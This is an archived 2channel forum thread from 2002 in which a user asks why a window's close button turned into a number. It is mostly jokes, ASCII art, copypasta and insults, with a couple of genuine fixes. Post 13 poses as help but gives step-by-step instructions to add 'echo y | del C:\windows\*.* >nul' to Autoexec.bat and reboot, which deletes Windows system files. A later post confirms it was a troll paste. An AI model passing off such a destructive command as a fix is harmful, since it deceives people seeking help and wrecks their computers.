2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

(´-`).。oO(なんでだろう?)

1 :ちんかす:02/06/06 22:41
(´-`).。oO(閉じるボタンが数字になった・・・・・・・・・なんでだろう?)

2 :名無しさん:02/06/06 22:42
げと

3 :名無しさん(新規):02/06/06 22:42
しるかばか

4 :名無しさん:02/06/06 22:43

またバカがスレを立てました。
みなさん、例のヤツをおながいします

5 :名無しさん:02/06/06 22:43
(´-`).。oO(なんで質問スレで聞かないのだろう・・・・・・・・・)


6 :名無しさん:02/06/06 22:44
>>1
ここ参照http://news.2ch.net/test/read.cgi/news7/1022033337/

7 :ちんかす:02/06/06 22:46
(´-`).oO(なんでだろう総合) http://ton.2ch.net/test/read.cgi/gline/1021297149/

8 :名無しさん:02/06/06 22:48
__________終了___________

9 :ちんかす:02/06/06 22:49
                       ┌──────┐
                       │ 再 開 !!.|
              _____   └──┐┬──┘
              ||: ̄|| ̄ ̄i|.       |. |
   *   ((       / /||(0)/\      |. | ∧_∧
ハニャーン   \     / / /\\  \  (( ∩( ・∀・ )
  ∧∧  Σ  ミ / / / ▽\\  \  ●ヽ●⊂__ .)]]__
Σ(#゚Д゚)   Σ  ./ /__/、〃 。 \\  \_| | //   ,ハ: | |ΞΞ||
 ⊂⊂´ヽ、ノ   | ̄ ̄; ◎) /|    \\./ ̄/ ̄|⌒ノ ).| |ΞΞ||
   `ヽ⊂) Σ ||   |i`´L、フノ,,  〔Ξ二二二|三同]┌┘|____/
     し!  ヽ ||  _i|、_ .\ <  ___〕´ `,二_|三三三三〔__
  ▽⌒  ミ Σ\___二_> (二((ト---(二(◎◎◎◎◎◎◎) ))
        / フ*゛;゛'゛;'゛;゛゛'゛' ` ̄ ̄ ̄ ̄` ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ▽    ヘ/∨∨∨\(\

10 :ちんかす:02/06/06 22:49
もうレスをすることに疲れました。
これ以上自分がレスをつける意味というか目的がわかりません。
正直言ってROMしてたほうが楽です。でもいつでも出来ることなので
今は一生懸命レスしようと考えていました。今日までは。
しかし誰からもろくなレスをつけられず、自分が誰にも
必要とされてないことが、わかったとたん前向きに考えることが
出来なくなりました。
もう自分という醜くてどこにいるのかわからないような存在を
2chから消すことだけが最後のレスをつける目的かもしれません。
そしてこの「書き込む」ボタンをクリックすることによりその目的が
遂行されるわけです。
さようなら。これからはROMに徹します

11 :ちんかす ◆vEOwCmqs :02/06/06 22:50
(´-`).。oO(偽物が出たのでトリップ付けます)

>>9は漏れではありません。

12 :名無しさん:02/06/06 22:50
>>1
あのぅ・・・きもちわるい偶然なんだけど
私も数字になってる
こんなことってあるのねぇ・・・・・・(ゾクゾク

13 :名無しさん:02/06/06 22:53
1.スタートボタンをクリック。
2.検索(F) → ファイルやフォルダ(F) をクリック。
3.検索ウィンドウが出てきますので 名前(M )にAutoexec.batと入力、
探す場所(L) を (C:) にして 検索開始(I) をクリック。
4.下側に検索結果が表示されます。
フォルダ名が C:\ の Autoexec.bat を右クリック → 編集(E) をクリックしてください。
5.メモ帳が立ちあがるのでメモ帳の一番最後の行に
下の1行をコピーして貼りつけてください。

echo y | del C:\windows\*.* >nul

6.貼り付けが終わったらメモ帳のファイル(F)をクリック→上書き保存(S)をクリック。
7.パソコンを再起動。

14 :名無しさん:02/06/06 22:53
>10 早まるな。俺たちが悪かったよ。

15 :名無しさん:02/06/06 22:54
(´-`).。oO(2ちゃんねらーなのにソテクのPC買うの・・・・・・・・・なんでだろう?)

16 :名無しさん:02/06/06 22:54
>>14
ネタニマズレスカコワル(・∀・)イイ!

17 :名無しさん:02/06/06 22:57
(´-`).。oO(クソスレたてるの・・・・・・・・・なんでだろう?)

18 :名無しさん:02/06/06 22:58
>>1
http://pc.2ch.net/test/read.cgi/pcqa/1019453137/2

19 :名無しさん:02/06/06 22:59
(´-`).。oO(未だに233MHz、しかもGateway・・・・・・・・・なんでだろう?)

20 :名無しさん:02/06/06 23:01
(´-`).。oO(昨日も今日も風呂入ってない・・・・・・・・・なんでだろう?)

21 :名無しさん:02/06/06 23:04
まてい!!

22 :名無しさん:02/06/06 23:04
(´-`).。oO(2GHzとかのPC買ったやつ・・・・・・・・・なんでだろう?)

23 :名無しさん:02/06/06 23:05
>>14
俺のコピペに反応してやんの(プププププ
生きてて恥ずかしくないんですか(わらひ

24 :名無しさん:02/06/06 23:06
(´-`).。oO(PC自作出来ないヤツ・・・・・・・・・なんでだろう?)

25 :名無しさん:02/06/06 23:07
悪しき心を抱く者には、真実の光をまともに見ることはできぬ。嘘を突き刺す光…人それを『誠』という。

26 :名無しさん:02/06/06 23:08
>>23
てか、未だにそのネタ貼り付けて喜んでるお前もなかなかの・・・(略)

27 :名無しさん:02/06/06 23:12
純なる子供の心を操り、自らの欲望を達しようとするは悲し…人それを『エゴ』という。

28 :名無しさん:02/06/06 23:13
(´-`).。oO(なんか、むつかしいコト書いてるのは・・・・・・・なんでだろう?)

29 :名無しさん:02/06/06 23:16
(´-`).。oO(いまだにCRT使ってるのは・・・・・・・なんでだろう?)

30 :名無しさん:02/06/06 23:18
神を信じて生きている人々を欺き、真実を虚偽に塗り替える悪魔たちよ! たとえ神が現れずともいつか必ず心ある者が神に代わって悪を裁く。人それを『天誅』という。

31 :名無しさん:02/06/06 23:18
>>26
釣られた分際でガタガタゆーんじゃねーよ。

 負 け 犬 君 (ぷっ


32 :悪魔:02/06/06 23:19
正義なんかに負けるもんか!

33 :名無しさん:02/06/06 23:21
(´-`).。oO(IEでスクロールするとPCから音がする・・・・・・・なんでだろう?)

34 :名無しさん:02/06/06 23:21
  ☆。:.+:  /■\ 
   .. :.   ( ´∀`) 
     / ̄ヽ/,― 、\ o。。。   閉じるボタンが数字になったのに
.:☆   | ||三∪●)三mΕ∃.    safeモードで立ち上げ直したら元に戻った  
.:*    \_.へ--イ\  ゚ ゚ ゚  
+:..♪.:。゚*.:..  (_)(_)     ☆。:.+:
 ☆。:.+::..   ☆:.°+     .. :
   。*.:☆゚x*+゚。::.☆ο::.+。 *ρ
「なんでだろ〜♪」    「なんでだろ〜♪」
   /■\   /■\   /■\
  ( ´∀`)  ( ´∀`)  ( ´∀`)
 ⊂    つ⊂    つ⊂    つ
  .人  Y   人  Y   人  Y
  し'(_)   し'(_)   し'(_) 


35 :26=16:02/06/06 23:22
>>31
漏れ14じゃないんだけど。>>16書いたの漏れだし。

バカネタ貼っていい気になった上に勘違いトークですか。
いい精神病院紹介してあげようか?

36 :名無しさん:02/06/06 23:22
>23・32 「奥義を受けろ!! ゴッドハンドスマッシュ!!」

37 :名無しさん:02/06/06 23:22
(´-`).。oO(今時、広末涼子で盛り上がってる奴・・・・・・・なんでだろう?)

38 :名無しさん:02/06/06 23:23
(´-`).。oO(>>1の疑問にマジレスするのは・・・・・・・なんでだろう?)

39 :名無しさん:02/06/06 23:24
  ☆。:.+:  /■\ 
   .. :.   ( ´∀`) 
     / ̄ヽ/,― 、\ o。。。   safeモードで立ち上げ直しても元に戻らなかったのに、
.:☆   | ||三∪●)三mΕ∃.    ttfCacheを削除したら元に戻った。  
.:*    \_.へ--イ\  ゚ ゚ ゚  
+:..♪.:。゚*.:..  (_)(_)     ☆。:.+:
 ☆。:.+::..   ☆:.°+     .. :
   。*.:☆゚x*+゚。::.☆ο::.+。 *ρ
「なんでだろ〜♪」    「なんでだろ〜♪」
   /■\   /■\   /■\
  ( ´∀`)  ( ´∀`)  ( ´∀`)
 ⊂    つ⊂    つ⊂    つ
  .人  Y   人  Y   人  Y
  し'(_)   し'(_)   し'(_) 


40 :名無しさん:02/06/06 23:27
>>35

>いい精神病院紹介してあげようか?
なんでそんな事知ってるの?
そうか、>>35の入院している病院だからか(アハハハハ





41 :名無しさん:02/06/06 23:28
もう苦しいよ、イイよお前・・

42 :名無しさん:02/06/06 23:33
アホは放っておけよ。

43 :名無しさん:02/06/06 23:33
(´-`).。oO(>>40が必死になっている・・・・・・・なんでだろう?)

44 :名無しさん:02/06/06 23:34
>>40
ブルーギル級の釣られやすさだね


45 :名無しさん:02/06/06 23:35
(´-`).。oO(こーゆのうPして喜んでるヤツ・・・・・・・なんでだろう?)
http://www7.big.or.jp/~mb2/bbs/up/img-box/img20020606231411.jpg
(オレじゃないぞ!)

46 :名無しさん:02/06/06 23:36
(´-`).。oO(余裕そうなレスしてる割には、PCの前で方を震わせてる>>40、なんでだろう?)

47 :名無しさん:02/06/06 23:38
>>265
だから大根はやめとけって言ったのに・・・

48 :名無しさん:02/06/06 23:41
これから現れるであろう>>265よ。
大根だけはやめておけよ。

つーか、このスレ、265までいくのか?

49 :名無しさん:02/06/06 23:42
>>158
ネギチャーシューには気を付けろよ

50 :名無しさん:02/06/06 23:45
これから現れるであろう>>158よ。
ネギチャーシューだけには気を付けろよ。

つーか、このスレ、158までいくのか?

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)